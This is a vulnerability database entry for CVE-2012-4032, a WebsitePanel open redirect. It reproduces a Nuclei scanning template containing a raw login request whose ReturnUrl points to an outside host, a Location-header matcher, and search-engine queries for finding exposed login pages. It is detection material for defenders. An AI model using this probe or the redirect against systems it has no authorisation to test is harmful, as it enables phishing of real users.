Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2012-4032
HistoryJun 14, 2023 - 4:20 p.m.

WebsitePanel before v1.2.2.1 - Open Redirect

2023-06-1416:20:20
ProjectDiscovery
github.com
5
vulnerability
phishing
exploitation
upgrade
websitepanel
cwe-20
cvss
cve-2012-4032

5.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

6.6 Medium

AI Score

Confidence

High

0.007 Low

EPSS

Percentile

79.8%

Open redirect vulnerability in the login page in WebsitePanel before 1.2.2.1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in ReturnUrl to Default.aspx
id: CVE-2012-4032

info:
  name: WebsitePanel before v1.2.2.1 - Open Redirect
  author: ctflearner
  severity: medium
  description: |
    Open redirect vulnerability in the login page in WebsitePanel before 1.2.2.1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in ReturnUrl to Default.aspx
  impact: |
    An attacker can trick users into visiting a malicious website, leading to potential phishing attacks or further exploitation.
  remediation: |
    Upgrade to WebsitePanel v1.2.2.1 or later to fix the open redirect vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2012-4032
    - https://www.exploit-db.com/exploits/37488
    - https://packetstormsecurity.com/files/114541/WebsitePanel-CMS-Open-Redirect.html
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/76803
    - http://websitepanel.codeplex.com/workitem/224
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N
    cvss-score: 5.8
    cve-id: CVE-2012-4032
    cwe-id: CWE-20
    epss-score: 0.00951
    epss-percentile: 0.81499
    cpe: cpe:2.3:a:websitepanel:websitepanel:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: websitepanel
    product: websitepanel
    shodan-query:
      - title:"WebsitePanel" html:"login"
      - http.title:"websitepanel" html:"login"
    fofa-query: title="websitepanel" html:"login"
    google-query: intitle:"websitepanel" html:"login"
  tags: cve,cve2012,packetstorm,redirect,websitepanel,authenticated

http:
  - raw:
      - |
        POST /Default.aspx?pid=Login&ReturnUrl=http%3A%2F%2Fwww.interact.sh HTTP/1.1
        Host: {{Hostname}}
        Cookie: UserCulture=en-US; .WEBSITEPANELPORTALAUTHASPX=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
        Content-Type: application/x-www-form-urlencoded

        ctl03%24ctl01%24ctl00%24txtUsername={{username}}&ctl03%24ctl01%24ctl00%24txtPassword={{password}}&ctl03%24ctl01%24ctl00%24btnLogin=+++Sign+In+++&ctl03%24ctl01%24ctl00%24ddlLanguage=en-US&ctl03%24ctl01%24ctl00%24ddlTheme=Default

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:http?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
# digest: 490a0046304402207a26f4858915a56030092800bf1f71a30d4c6bbb2d65af1b97307df3af2370a202200387753f9b464f8878e789c36df39c2d8df8a8df9e2a86ac5dcf1db35690f7ad:922c64590222798bb761d5b6d8e72950

5.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

6.6 Medium

AI Score

Confidence

High

0.007 Low

EPSS

Percentile

79.8%

Related for NUCLEI:CVE-2012-4032